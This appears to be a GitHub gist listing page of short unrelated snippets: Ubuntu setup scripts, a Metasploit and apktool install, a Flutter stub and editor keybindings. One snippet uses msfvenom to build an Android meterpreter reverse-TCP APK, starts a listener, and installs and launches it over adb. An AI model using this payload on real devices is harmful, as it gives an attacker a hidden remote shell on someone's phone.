This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [CONST_PARAM] | |
| rtsp = 1 ; RTSPЭ�飬0���ر� 1������ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| history -w orendon_hist_$(date +%Y-%m-%d_%H-%M-%S).txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Install metasploit | |
| curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall | |
| chmod 755 msfinstall | |
| ./msfinstall | |
| # Create msf database. | |
| msfdb init | |
| # Launch msfconsole |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo apt update | |
| sudo apt install -y build-essential curl make git vim hub libssl-dev graphviz jq cmake clang pkg-config p7zip terminator gnome-tweaks fonts-firacode protobuf-compiler | |
| # intune | |
| sudo apt install libpam-pwquality | |
| sudo nano /etc/pam.d/common-password | |
| # password requisite pam_pwquality.so retry=3 dcredit=-1 ocredit=-1 ucredit=-1 lcredit=-1 minlen=12 | |
| curl -sSl https://packages.microsoft.com/keys/microsoft.asc | sudo tee /etc/apt/trusted.gpg.d/microsoft.asc | |
| wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Add other repos, update package listings, upgrade OS if available | |
| sudo add-apt-repository multiverse | |
| sudo add-apt-repository ppa:obsproject/obs-studio | |
| sudo add-apt-repository ppa:otto-kesselgulasch/gimp | |
| sudo add-apt-repository ppa:ubuntuhandbook1/audacity | |
| sudo add-apt-repository ppa:qbittorrent-team/qbittorrent-stable | |
| curl -sL https://deb.nodesource.com/setup_13.x | sudo -E bash - | |
| curl https://build.opensuse.org/projects/home:manuelschneid3r/public_key | sudo apt-key add - | |
| echo 'deb http://download.opensuse.org/repositories/home:/manuelschneid3r/xUbuntu_19.04/ /' | sudo tee /etc/apt/sources.list.d/home:manuelschneid3r.list | |
| curl https://downloads.plex.tv/plex-keys/PlexSign.key | sudo apt-key add - |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ########################################### | |
| # Tried and tested on my Ubuntu 24.04.3 # | |
| ########################################### | |
| sudo apt update | |
| # To handle system hangs | |
| sudo apt purge -y intel-microcode |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import 'package:flutter/material.dart'; | |
| import 'package:webview_flutter/webview_flutter.dart'; | |
| void main() => runApp(MaterialApp(home: MyApp())); | |
| class MyApp extends StatelessWidget { | |
| static Future<String> get _url async { | |
| await Future.delayed(Duration(seconds: 1)); | |
| return 'https://flutter.dev/'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.6 LPORT=4444 -o msf.apk | |
| msfconsole -qx "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set ExitOnSession false; exploit -j -z" | |
| adb install msf.apk | |
| adb shell am start -n com.metasploit.stage/.MainActivity |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Place your key bindings in this file to override the defaults | |
| [ | |
| { | |
| "key": "ctrl+.", | |
| "command": "editor.action.triggerSuggest", | |
| "when": "editorHasCompletionItemProvider && textInputFocus && !editorReadonly" | |
| } | |
| ] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get latest version from https://bitbucket.org/iBotPeaches/apktool/downloads | |
| export apktool_version=2.3.1 | |
| sudo -E sh -c 'wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_$apktool_version.jar -O /usr/local/bin/apktool.jar' | |
| sudo chmod +r /usr/local/bin/apktool.jar | |
| sudo sh -c 'wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool -O /usr/local/bin/apktool' | |
| sudo chmod +x /usr/local/bin/apktool | |
| # To use: | |
| # apktool d TelephonyProvider.apk -o TelephonyProvider |
NewerOlder